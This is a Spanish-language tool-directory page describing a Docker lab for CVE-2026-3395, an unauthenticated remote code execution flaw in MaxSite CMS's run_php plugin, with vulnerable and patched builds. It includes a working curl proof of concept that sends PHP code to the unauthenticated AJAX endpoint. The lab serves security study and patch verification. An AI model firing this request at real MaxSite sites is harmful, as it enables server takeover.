Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-3395-Lab — Lab educativo de Docker que demuestra CVE-2026-3395, un RCE no autenticado en MaxSite CMS a través del plugin run_php, con entornos vulnerables y parcheados para una reproducción y análisis seguros. | Kitploit
Herramientas/GitHubGitHub/rootdirective-sec/cve-2026-3395-lab
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubrootdirective-sec/cve-2026-3395-lab

CVE-2026-3395-Lab

Lab educativo de Docker que demuestra CVE-2026-3395, un RCE no autenticado en MaxSite CMS a través del plugin run_php, con entornos vulnerables y parcheados para una reproducción y análisis seguros.

Ver Repositorio
1hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-3395 — Laboratorio de RCE no autenticado en MaxSite CMS

Este repositorio es solo para fines educativos y de investigación. Todas las pruebas deben realizarse en un entorno de laboratorio Docker local. No implemente esta configuración en sistemas públicos o de producción.


Resumen

CVE-2026-3395 afecta a MaxSite CMS y permite el acceso no autenticado a un endpoint AJAX administrativo. Cuando el plugin run_php está habilitado, la entrada del usuario puede evaluarse como código PHP a través del sistema de hooks del CMS, lo que puede conducir a la Ejecución Remota de Código (RCE).

Este repositorio incluye:

  • Una compilación vulnerable (commit anterior al parche)
  • Una compilación parcheada (commit posterior a la corrección)
  • Un laboratorio Docker para la reproducción
  • Una demostración segura del impacto

Descripción general de la vulnerabilidad

El endpoint vulnerable se encuentra en:

root@kitploit:~
application/maxsite/admin/plugins/editor_markitup/preview-ajax.php

En la versión vulnerable:

  • Se puede acceder al endpoint sin autenticación
  • La entrada del usuario (datos POST) se pasa a través de
mso_hook()
  • El plugin run_php procesa los bloques [php]...[/php]
  • El plugin evalúa el código encerrado usando eval()
  • Si run_php está habilitado, esto resulta en una ejecución remota de código no autenticada.

    La versión parcheada añade:

    root@kitploit:~
    if (!is_login()) die('no login');
    mso_checkreferer();
    

    Esto restringe el acceso solo a usuarios autenticados.


    Configuración del laboratorio Docker

    Este laboratorio construye dos entornos:

    EntornoPuerto
    Vulnerable8081
    Parcheado8082

    Requisitos

    • Docker
    • Docker Compose v2

    1. Compilar e iniciar

    root@kitploit:~
    docker compose up -d --build
    

    Esto hará lo siguiente:

    • Compilar ambas imágenes
    • Iniciar las bases de datos
    • Ejecutar el instalador del CMS automáticamente
    • Habilitar run_php en la configuración del laboratorio

    2. Verificar la instalación

    Abra en su navegador:

    root@kitploit:~
    http://localhost:8081  (Vulnerable)
    http://localhost:8082  (Parcheado)
    

    Ambas instancias deberían cargar correctamente.

    Laboratorio en ejecución


    Prueba de la vulnerabilidad (solo laboratorio)

    La ruta AJAX utiliza una ruta codificada en base64.

    El base64 de:

    root@kitploit:~
    admin/plugins/editor_markitup/preview-ajax.php
    

    es:

    root@kitploit:~
    YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==
    

    Prueba en la instancia vulnerable

    root@kitploit:~
    curl -X POST "http://localhost:8081/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
      -H "X-Requested-With: XMLHttpRequest" \
      -H "Referer: http://localhost:8081/" \
      --data-urlencode "data=[php]system('id');[/php]"
    

    Salida RCE vulnerable


    Prueba en la instancia parcheada

    root@kitploit:~
    curl -X POST "http://localhost:8082/ajax/YWRtaW4vcGx1Z2lucy9lZGl0b3JfbWFya2l0dXAvcHJldmlldy1hamF4LnBocA==" \
      -H "X-Requested-With: XMLHttpRequest" \
      -H "Referer: http://localhost:8082/" \
      --data-urlencode "data=[php]system('id');[/php]"
    

    Resultado esperado:

    root@kitploit:~
    no login
    

    Control de acceso parcheado


    Detener el laboratorio

    Para detener los contenedores:

    root@kitploit:~
    docker compose down -v
    

    Aviso legal

    Utilice este proyecto solo en entornos aislados con fines de investigación y aprendizaje.


    Referencias

    • Informe público: https://github.com/mbanyamer/CVE-2026-3395-MaxSite-CMS-Unauthenticated-RCE/
    • Entrada de VulDB: https://vuldb.com/?submit.762169
    • Commit oficial del parche: https://github.com/maxsite/cms/commit/08937a3c5d672a242d68f53e9fccf8a748820ef3
    Descargar herramienta